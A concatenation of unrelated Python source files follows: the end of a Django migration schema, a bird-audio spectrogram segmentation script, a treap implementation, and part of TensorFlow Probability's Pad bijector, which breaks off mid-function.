'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Location']"}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}) }, 'catalog.topmakeys': { 'Meta': {'object_name': 'TopMakeys'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.topproducts': { 'Meta': {'object_name': 'TopProducts'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.topshops': { 'Meta': {'object_name': 'TopShops'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"}) }, 'catalog.toptutorials': { 'Meta': {'object_name': 'TopTutorials'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"}) }, 'catalog.topusers': { 'Meta': {'object_name': 'TopUsers'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.tutorial': { 'Meta': {'object_name': 'Tutorial'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'tutorialimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}), 'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.userflags': { 'Meta': {'object_name': 'UserFlags'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'show_maker_intro': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'show_makey_intro': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.userinteraction': { 'Meta': {'object_name': 'UserInteraction'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'event': ('django.db.models.fields.IntegerField', [], {}), 'event_id': ('django.db.models.fields.IntegerField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.userprofile': { 'Meta': {'object_name': 'UserProfile'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.User']"}) }, 'catalog.video': { 'Meta': {'object_name': 'Video'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}), 'embed_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'site': ('django.db.models.fields.IntegerField', [], {}), 'thumb_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}) }, 'catalog.votemakey': { 'Meta': {'unique_together': "(('user', 'makey'),)", 'object_name': 'VoteMakey'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'}) }, 'catalog.voteproductreview': { 'Meta': {'unique_together': "(('user', 'review'),)", 'object_name': 'VoteProductReview'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'review': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ProductReview']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'}) }, 'catalog.voteshopreview': { 'Meta': {'unique_together': "(('user', 'review'),)", 'object_name': 'VoteShopReview'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'review': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ShopReview']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'}) }, 'catalog.votetutorial': { 'Meta': {'unique_together': "(('user', 'tutorial'),)", 'object_name': 'VoteTutorial'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'}) }, u'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) } } complete_apps = ['catalog']
import numpy as np import pandas as pd import scipy as sp import pickle from scipy import fft from time import localtime, strftime import matplotlib.pyplot as plt from skimage.morphology import disk,remove_small_objects from skimage.filter import rank from skimage.util import img_as_ubyte import wave ########################### # Folder Name Setting ########################### folder = 'J:/DATAMINING/KAGGLE/MLSP_BirdClassification/' essential_folder = folder+'essential_data/' supplemental_folder = folder+'supplemental_data/' spectro_folder =folder+'my_spectro/' single_spectro_folder =folder+'my_spectro_single/' dp_folder = folder+'DP/' ################################################### ## Read the Essential Data ## labels, training-test split,file_names etc. ################################################### # Each audio file has a unique recording identifier ("rec_id"), ranging from 0 to 644. # The file rec_id2filename.txt indicates which wav file is associated with each rec_id. rec2f = pd.read_csv(essential_folder + 'rec_id2filename.txt', sep = ',') # There are 19 bird species in the dataset. species_list.txt gives each a number from 0 to 18. species = pd.read_csv(essential_folder + 'species_list.txt', sep = ',') num_species = 19 # The dataset is split into training and test sets. # CVfolds_2.txt gives the fold for each rec_id. 0 is the training set, and 1 is the test set. cv = pd.read_csv(essential_folder + 'CVfolds_2.txt', sep = ',') # This is your main label training data. For each rec_id, a set of species is listed. The format is: # rec_id,[labels] raw = pd.read_csv(essential_folder + 'rec_labels_test_hidden.txt', sep = ';') label = np.zeros(len(raw)*num_species) label = label.reshape([len(raw),num_species]) for i in range(len(raw)): line = raw.irow(i) labels = line[0].split(',') labels.pop(0) # rec_id == i for c in labels: if(c != '?'): label[i,c] = 1 label = pd.DataFrame(label) label['rec_id'] = cv.rec_id label['fold'] = cv.fold label['filename'] = rec2f.filename # Sparse training set # training species 1%--5%--20% spec_avg = label[label.fold ==0][range(num_species)].mean() spec_avg.sort() plt.plot(spec_avg,'go') # Read the audio files # /src_wavs # This folder contains the original wav files for the dataset (both training and test sets). # These are 10-second mono recordings sampled at 16kHz, 16 bits per sample. def pic_to_ubyte (pic): a = (pic-np.min(pic) ) /(np.max(pic - np.min(pic))) a = img_as_ubyte(a) return a # Parameters to create the spectrogram N = 160000 K = 512 Step = 4 wind = 0.5*(1 -np.cos(np.array(range(K))*2*np.pi/(K-1) )) ffts = [] def wav_to_floats(filename): s = wave.open(filename,'r') strsig = s.readframes(s.getnframes()) y = np.fromstring(strsig, np.short) s.close() return y ############################### ## Create the Spectrograms ## Train + Test ############################### print strftime("%a, %d %b %Y %H:%M:%S +0000", localtime()) for file_idx in range(len(label)): test_flag = label.irow(file_idx)['fold'] fname = label.irow(file_idx)['filename'] species_on_pic = [] for n in range(num_species): if(label.irow(file_idx)[n] > 0): species_on_pic.append(n) S = wav_to_floats(essential_folder+'src_wavs/'+fname+'.wav') Spectogram = [] for j in range(int(Step*N/K)-Step): vec = S[j * K/Step : (j+Step) * K/Step] * wind Spectogram.append(abs(fft(vec,K)[:K/2])) ffts.append(np.array(Spectogram)) print strftime("%a, %d %b %Y %H:%M:%S +0000", localtime()) SPEC_SEGMENTS = [] LOG_SPEC_SEGMENTS = [] MIN_SEGMENT_SIZE = 99 p = 90 #fig = plt.figure(figsize=(20, 10)) for file_idx in range(len(label)): test_flag = label.irow(file_idx)['fold'] fname = label.irow(file_idx)['filename'] species_on_pic = [] for n in range(num_species): if(label.irow(file_idx)[n] > 0): species_on_pic.append(n) label_count = label.irow(file_idx)[range(num_species)].sum() bird_spec = label.irow(file_idx)[range(num_species)].argmax() # first bird if(test_flag < 1 and label_count ==1): mypic = np.transpose(ffts[file_idx]) mypic_rev = np.zeros_like(mypic) for i in range(mypic.shape[0]): mypic_rev[i] = mypic[-i - 1] mypic_rev_small = mypic_rev[:200,:] mypic_rev = mypic_rev_small mypic_rev_log = np.log10(mypic_rev+ 0.001) mypic_rev_gauss =sp.ndimage.gaussian_filter(mypic_rev, sigma=3) mypic_rev_log_gauss = sp.ndimage.gaussian_filter(mypic_rev_log, sigma=3) mypic_rev_gauss_bin = mypic_rev_gauss > np.percentile(mypic_rev_gauss,p) mypic_rev_log_gauss_bin = mypic_rev_log_gauss > np.percentile(mypic_rev_log_gauss,p) mypic_rev_gauss_bin_close =sp.ndimage.binary_closing( sp.ndimage.binary_opening(mypic_rev_gauss_bin)) mypic_rev_log_gauss_bin_close =sp.ndimage.binary_closing( sp.ndimage.binary_opening(mypic_rev_log_gauss_bin)) mypic_rev_gauss_grad = rank.gradient(pic_to_ubyte(mypic_rev_gauss), disk(3)) mypic_rev_log_gauss_grad = rank.gradient(pic_to_ubyte(mypic_rev_log_gauss), disk(3)) mypic_rev_gauss_grad_bin = mypic_rev_gauss_grad > np.percentile(mypic_rev_gauss_grad,p) mypic_rev_log_gauss_grad_bin = mypic_rev_log_gauss_grad > np.percentile(mypic_rev_log_gauss_grad,p ) mypic_rev_gauss_grad_bin_close =sp.ndimage.binary_closing( sp.ndimage.binary_opening(mypic_rev_gauss_grad_bin)) mypic_rev_log_gauss_grad_bin_close =sp.ndimage.binary_closing( sp.ndimage.binary_opening(mypic_rev_log_gauss_grad_bin)) bfh = sp.ndimage.binary_fill_holes(mypic_rev_gauss_grad_bin_close) bfh_rm = remove_small_objects(bfh, MIN_SEGMENT_SIZE) log_bfh = sp.ndimage.binary_fill_holes(mypic_rev_log_gauss_grad_bin_close) log_bfh_rm = remove_small_objects(log_bfh, MIN_SEGMENT_SIZE) # plt.subplot(6,2,1) # plt.imshow(mypic_rev,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('Spectrogram') # plt.subplot(6,2,2) # plt.imshow(mypic_rev_log,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('Spectrogram (log)') # plt.subplot(6,2,3) # plt.imshow(mypic_rev_log_gauss,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('+ Gaussian Filtering') # plt.subplot(6,2,4) # plt.imshow(mypic_rev_log,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('+ Gaussian Filtering (log)') # plt.subplot(6,2,5) # plt.imshow(mypic_rev_gauss_grad,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('+ Gradient') # plt.subplot(6,2,6) # plt.imshow(mypic_rev_log_gauss_grad,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('+ Gradient (log)') # plt.subplot(6,2,7) # plt.imshow(mypic_rev_gauss_grad_bin,cmap=plt.cm.gray) # plt.axis('off') # plt.title('+ >90%') # plt.subplot(6,2,8) # plt.imshow(mypic_rev_log_gauss_grad_bin,cmap=plt.cm.gray) # plt.axis('off') # plt.title('+ >90% (log)') # plt.subplot(6,2,9) # plt.imshow(mypic_rev_gauss_grad_bin_close,cmap=plt.cm.gray) # plt.axis('off') # plt.title('+ binary_closing + binary_opening') # plt.subplot(6,2,10) # plt.imshow(mypic_rev_log_gauss_grad_bin_close,cmap=plt.cm.gray) # plt.axis('off') # plt.title('+ binary_closing + binary_opening (log)') #SEGMENTS labeled_segments, num_seg = sp.ndimage.label(bfh_rm) # plt.subplot(6,2,11) # plt.imshow(labeled_segments) # plt.axis('off') # plt.title('+ binary_fill_holes + remove_small_objects') for current_segment_id in range(1,num_seg+1): current_segment = (labeled_segments == current_segment_id)*1 xr = current_segment.max(axis = 0) yr = current_segment.max(axis = 1) xr_max = np.max(xr*np.arange(len(xr))) xr[xr==0] = xr.shape[0] xr_min = np.argmin(xr) yr_max = np.max(yr*np.arange(len(yr))) yr[yr==0] = yr.shape[0] yr_min = np.argmin(yr) segment_frame = [yr_min, yr_max, xr_min, xr_max] subpic = mypic_rev_gauss[yr_min:yr_max+1,xr_min:xr_max+1] SPEC_SEGMENTS.append([file_idx, current_segment_id, segment_frame, subpic]) # LOG SEGMENTS labeled_segments, num_seg = sp.ndimage.label(log_bfh_rm) # plt.subplot(6,2,12) # plt.imshow(labeled_segments) # plt.axis('off') # plt.title('+ binary_fill_holes + remove_small_objects (log)') for current_segment_id in range(1,num_seg+1): current_segment = (labeled_segments == current_segment_id)*1 xr = current_segment.max(axis = 0) yr = current_segment.max(axis = 1) xr_max = np.max(xr*np.arange(len(xr))) xr[xr==0] = xr.shape[0] xr_min = np.argmin(xr) yr_max = np.max(yr*np.arange(len(yr))) yr[yr==0] = yr.shape[0] yr_min = np.argmin(yr) segment_frame = [yr_min, yr_max, xr_min, xr_max] subpic = mypic_rev_log_gauss[yr_min:yr_max+1,xr_min:xr_max+1] LOG_SPEC_SEGMENTS.append([file_idx, current_segment_id, segment_frame, subpic]) #fig.savefig(single_spectro_folder+str(bird_spec)+'_'+fname+'_patterns.png',dpi = 300) #fig.clear() #plt.show() print strftime("%a, %d %b %Y %H:%M:%S +0000", localtime()) ## CHECK THE SEGMENTS: #N = 10 #fig = plt.figure(figsize=(20, 10)) #for i in range(N): # for j in range(N): # plt.subplot(N,N,i*N+j) # plt.imshow( SPEC_SEGMENTS[i*N+j][3]) # # #N = 10 #fig = plt.figure(figsize=(20, 10)) #for i in range(N): # for j in range(N): # plt.subplot(N,N,i*N+j) # plt.imshow( LOG_SPEC_SEGMENTS[-(i*N+j)][3],cmap=plt.cm.afmhot_r) # #a = [] #for r in SPEC_SEGMENTS: # a.append(r[2][1] - r[2][0] ) # #plt.hist(a) output = open(dp_folder + 'SPEC_SEGMENTS.pkl', 'wb') pickle.dump(SPEC_SEGMENTS, output) output.close() output = open(dp_folder + 'LOG_SPEC_SEGMENTS.pkl', 'wb') pickle.dump(LOG_SPEC_SEGMENTS, output) output.close()
from __future__ import print_function import random import sys class _Node(object): def __init__(self, val): self.val = val self.p = self.l = self.r = None self.size = 1 self.priority = random.random() def fix_size_to_top(self): self.size = 1 for c in [self.l, self.r]: if c is not None: self.size += c.size if self.p is not None: self.p.fix_size_to_top() def assert_valid(self, lt): if self.l is None: l_size = 0 else: assert self.l.p is self assert not lt(self.val, self.l.val) assert self.l.priority >= self.priority l_size = self.l.assert_valid(lt) if self.r is None: r_size = 0 else: assert self.r.p is self assert not lt(self.r.val, self.val) assert self.r.priority >= self.priority r_size = self.r.assert_valid(lt) assert l_size + 1 + r_size == self.size return self.size def print_(self, indent): if self.p is not None and self.p.l is self: print(' ' * indent, 'l', self.val) elif self.p is not None and self.p.r is self: print(' ' * indent, 'r', self.val) else: print(' ' * indent, 't', self.val) if self.l is not None: self.l.print_(indent + 1) if self.r is not None: self.r.print_(indent + 1) def rotate_left(self): p, b, q = self, self.r.l, self.r assert p is not None and q is not None parent = p.p if parent is not None: is_l = parent.l is p p.make_right_child(b) q.make_left_child(p) if parent is not None: if is_l: parent.make_left_child(q) else: parent.make_right_child(q) else: q.p = None def rotate_right(self): p, b, q = self.l, self.l.r, self assert p is not None and q is not None parent = q.p if parent is not None: is_l = parent.l is q q.make_left_child(b) p.make_right_child(q) if parent is not None: if is_l: parent.make_left_child(p) else: parent.make_right_child(p) else: p.p = None def make_left_child(self, other): self.l = other self._make_child(other) def make_right_child(self, other): self.r = other self._make_child(other) def _make_child(self, other): if other is not None: other.p = self self.size = 1 for c in [self.l, self.r]: if c is not None: self.size += c.size class Treap(object): def __init__(self, lt): self._root = None self._lt = lt def insert(self, v): n = _Node(v) if self._root is None: self._root = n return n ins = self._root while True: if self._lt(v, ins.val): if ins.l is None: ins.make_left_child(n) n.fix_size_to_top() self._ins_fix(n) return n ins = ins.l else: if ins.r is None: ins.make_right_child(n) n.fix_size_to_top() self._ins_fix(n) return n ins = ins.r def erase(self, n): if n.l is None and n.r is None: if n.p is None: assert self._root is n self._root = None return if n.p.l is n: n.p.l = None else: n.p.r = None n.p.fix_size_to_top() return if n.l is None: if n.p is None: assert self._root is n self._root, n.r.p = n.r, None return if n.p.l is n: n.p.l = n.r else: n.p.r = n.r n.r.p = n.p n.p.fix_size_to_top() return if n.r is None: if n.p is None: assert self._root is n self._root, n.l.p = n.l, None return if n.p.l is n: n.p.l = n.l else: n.p.r = n.l n.l.p = n.p n.p.fix_size_to_top() return if n.l.priority < n.r.priority: if n is self._root: self._root = n.l n.rotate_right() else: if n is self._root: self._root = n.r n.rotate_left() self.erase(n) def kth(self, k): node = self._root while True: assert node is not None assert node.size > k l = 0 if node.l is None else node.l.size if l == k: return node.val elif l > k: node = node.l else: node, k = node.r, k - l - 1 def size(self): return 0 if self._root is None else self._root.size def assert_valid(self): if self._root is not None: assert self._root.p is None self._root.assert_valid(self._lt) def _ins_fix(self, n): p = n.p if p is None or p.priority <= n.priority: return if p.l is n: p.rotate_right() else: p.rotate_left() if p is self._root: self._root = n else: self._ins_fix(n)
# Copyright 2019 The TensorFlow Probability Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Pad bijector.""" import numpy as np import tensorflow.compat.v2 as tf from tensorflow_probability.python.bijectors import bijector from tensorflow_probability.python.internal import assert_util from tensorflow_probability.python.internal import parameter_properties from tensorflow_probability.python.internal import prefer_static as ps from tensorflow_probability.python.internal import tensor_util from tensorflow_probability.python.internal import tensorshape_util __all__ = [ 'Pad', ] class Pad(bijector.AutoCompositeTensorBijector): """Pads a value to the `event_shape` of a `Tensor`. The semantics of `tfp.bijectors.Pad` generally follow that of `tf.pad()` except that `tfp.bijectors.Pad`'s `paddings` argument applies to the rightmost dimensions. Additionally, the new argument `axis` enables overriding the dimensions to which `paddings` is applied. Like `paddings`, the `axis` argument is also relative to the rightmost dimension and must therefore be negative. The argument `paddings` is a vector of `int` pairs each representing the number of left and/or right `constant_values` to pad to the corresponding righmost dimensions. That is, unless `axis` is specified, specifiying `k` different `paddings` means the rightmost `k` dimensions will be "grown" by the sum of the respective `paddings` row. When `axis` is specified, it indicates the dimension to which the corresponding `paddings` element is applied. By default `axis` is `None` which means it is logically equivalent to `range(start=-len(paddings), limit=0)`, i.e., the rightmost dimensions. Example usage: ```python b = tfp.bijectors.Pad() # Default arguments. b.forward([3., 4.]) # shape: [2] # ==> [[3., 4., 0.]] # shape: [3] b.forward([[1., 2.], [3., 4.]]) # shape: [2, 2] # ==> [[1., 2., 0.], # [3., 4., 0.]] # shape: [2, 3] b.inverse([3., 4., 0.]) # shape: [3] # ==> [3., 4.] # shape: [2] b.forward_log_det_jacobian(any_value) # ==> 0. b.inverse_log_det_jacobian(any_value) # ==> 0. ``` ```python b = tfp.bijectors.Pad(axis=-2) # With non-default `axis` arg. b.forward([[3., 4.]]) # shape: [1, 2] # ==> [[3., 4.], # shape: [2, 2] # [0., 0.]] b.inverse([[3., 4.], # shape: [2, 2] [0., 0.]]) # ==> [[3., 4.]] # shape: [1, 2] b.forward_log_det_jacobian(any_value) # ==> 0. b.inverse_log_det_jacobian(any_value) # ==> 0. ``` """ def __init__(self, paddings=((0, 1),), mode='CONSTANT', constant_values=0, axis=None, validate_args=False, name=None): """Initializes the `Pad` bijector. Args: paddings: A vector-shaped `Tensor` of `int` pairs representing the number of elements to pad on the left and right, respectively. Default value: `((0, 1),)`. mode: One of `'CONSTANT'`, `'REFLECT'`, or `'SYMMETRIC'` (case-insensitive). For more details, see `tf.pad`. constant_values: In "CONSTANT" mode, the scalar pad value to use. Must be same type as `tensor`. For more details, see `tf.pad`. axis: The dimensions for which `paddings` are applied. Must be 1:1 with `paddings` or `None`. Default value: `None` (i.e., `tf.range(start=-len(paddings), limit=0)`). validate_args: Python `bool` indicating whether arguments should be checked for correctness. Default value: `False`. name: Python `str`, name given to ops managed by this object. Default value: `None` (i.e., `'pad'`). """ parameters = dict(locals()) with tf.name_scope(name or 'pad') as name: paddings = tensor_util.convert_nonref_to_tensor( paddings, dtype_hint=tf.int32, name='paddings', as_shape_tensor=True) if axis is None: axis = ps.range( start=-ps.size0(paddings), limit=0, dtype=tf.int32, name='axis') else: axis = tensor_util.convert_nonref_to_tensor( axis, dtype_hint=tf.int32, name='axis', as_shape_tensor=True) axis_ = tf.get_static_value(axis) if axis_ is None: raise NotImplementedError( 'Argument `axis` must be known statically. If you need this ' 'feature, please contact `tfprobability@tensorflow.org`.') self._axis = axis self._paddings = paddings self._mode = mode self._constant_values = tensor_util.convert_nonref_to_tensor( constant_values, dtype_hint=tf.float32, name='constant_values') min_event_ndims_ = int(-np.min(np.pad( np.reshape(axis_, newshape=[-1]), mode='constant', pad_width=[[0, 1]]))) super(Pad, self).__init__( forward_min_event_ndims=min_event_ndims_, inverse_min_event_ndims=min_event_ndims_, is_constant_jacobian=True, validate_args=validate_args, parameters=parameters, name=name) @classmethod def _parameter_properties(cls, dtype): return dict( paddings=parameter_properties.ShapeParameterProperties(), constant_values=parameter_properties.ParameterProperties(), axis=parameter_properties.ShapeParameterProperties()) @property def paddings(self): return self._paddings @property def mode(self): return self._mode @property def constant_values(self): return self._constant_values @property def axis(self): return self._axis def _forward(self, x): ndims = ps.rank(x) indices = ps.reshape(ps.add(self.axis, ndims), shape=[-1, 1]) return tf.pad( x, paddings=ps.tensor_scatter_nd_update( ps.zeros([ndims, 2], dtype=tf.int32), indices, self.paddings), mode=self.mode, constant_values=ps.cast(self.constant_values, dtype=x.dtype)) def _inverse(self, y): ndims = ps.rank(y) indices = ps.reshape(ps.add(self.axis, ndims), shape=[-1, 1]) num_left, num_right = ps.unstack(self.paddings, num=2, axis=-1) x = tf.slice( y, begin=ps.tensor_scatter_nd_update( ps.zeros(ndims, dtype=tf.int32), indices, num_left), size=ps.tensor_scatter_nd_sub( ps.shape(y), indices, num_left + num_right)) if not self.validate_args: return x assertions = [ assert_util.assert_equal( self._forward(x), y, message=('Argument `y` to `inverse` was not padded with ' '`constant_values`.')), ] with tf.control_dependencies(assertions): return tf.identity(x) def _inverse_log_det_jacobian(self, y): # We specifically don't validate `y` here because sometimes folks pass dummy # values when `is_constant_jacobian`. return tf.zeros([], dtype=y.dtype) def _forward_log_det_jacobian(self, x): return tf.zeros([], dtype=x.dtype) def _forward_event_shape(self, input_shape, is_inverse=False): axis = tf.get_static_value(self.axis) paddings = tf.get_static_value(self.paddings) if input_shape.ndims is None or axis is None or paddings is None: return None output_shape = [tf.compat.dimension_value(d) for d in list(input_shape)] for a, p in zip(list(axis.reshape(-1)), list(paddings.sum(axis=-1))): if output_shape[a] is not None: output_shape[a] += -p if is_inverse else p return output_shape def _forward_event_shape_tensor(self, input_shape, is_inverse=False): ndims = ps.size(input_shape) indices = ps.reshape(ps.add(self.axis, ndims), shape=[-1, 1]) extra_sizes = ps.reduce_sum(self.paddings, axis=-1) update_fn = (ps.tensor_scatter_nd_sub if is_inverse else ps.tensor_scatter_nd_add) return update_fn(ps.identity(input_shape), indices, extra_sizes) def _inverse_event_shape(self, output_shape): input_shape = self._forward_event_shape(output_shape, is_inverse=True) if input_shape is not None and any(s < 0 for s in input_shape): raise ValueError('Invalid inverse shape; {}'.format(input_shape)) return input_shape def _inverse_event_shape_tensor(self, output_shape): input_shape = self._forward_event_shape_tensor( output_shape, is_inverse=True) if not self.validate_args: return input_shape assertions = [ assert_util.assert_greater( input_shape, -1, message='Invalid inverse shape; found negative size.') ] with tf.control_dependencies(assertions): return tf.identity(input_shape) def _parameter_control_dependencies(self, is_init): assertions = [] axis = None paddings = None if is_init != tensor_util.is_ref(self.axis): # First we check the shape of the axis argument. msg = 'Argument `axis` must be scalar or vector.' if tensorshape_util.rank(self.axis.shape) is not None: if tensorshape_util.rank(self.axis.shape) > 1: raise ValueError(msg) elif self.validate_args: if axis is None: axis = tf.convert_to_tensor(self.axis) assertions.append(assert_util.assert_rank_at_most( axis, 1, message=msg)) # Next we check the values of the axis argument. axis_ = tf.get_static_value(self.axis) msg = 'Argument `axis` must be negative.' if axis_ is not None: if np.any(axis_ > -1): raise ValueError(msg) elif self.validate_args: if axis is None: axis = tf.convert_to_tensor(self.axis) assertions.append(assert_util.assert_less(axis, 0, message=msg)) msg = 'Argument `axis` elements must be unique.' if axis_ is not None: if len(np.array(axis_).reshape(-1)) != len(np.unique(axis_)): raise ValueError(msg) elif self.validate_args: if axis is None: axis = tf.convert_to_tensor(self.axis) assertions.append(assert_util.assert_equal( ps.size0(axis), ps.size0(ps.setdiff1d(axis)), message=msg)) if is_init != tensor_util.is_ref(self.paddings): # First we check the shape of the paddings argument. msg = 'Argument `paddings` must be a vector of pairs.' if tensorshape_util.is_fully_defined(self.paddings.shape): shape = np.int32(self.paddings.shape) if len(shape) != 2 or shape[0] < 1 or shape[1] != 2: raise ValueError(msg) elif self.validate_args: if paddings is None: paddings = tf.convert_to_tensor(self.paddings) with tf.control_dependencies([ assert_util.assert_equal(tf.rank(paddings), 2, message=msg)]): shape = tf.shape(paddings) assertions.extend([ assert_util.assert_greater(shape[0], 0, message=msg), assert_util.assert_equal(shape[1], 2, message=msg), ]) # Next we check the values of the paddings argument. paddings_ = tf.get_static_value(self.paddings) msg = 'Argument `paddings` must be non-negative.' if paddings_ is not None: if np.any(paddings_ < 0): raise ValueError(msg) elif self.validate_args: if paddings is None: paddings = 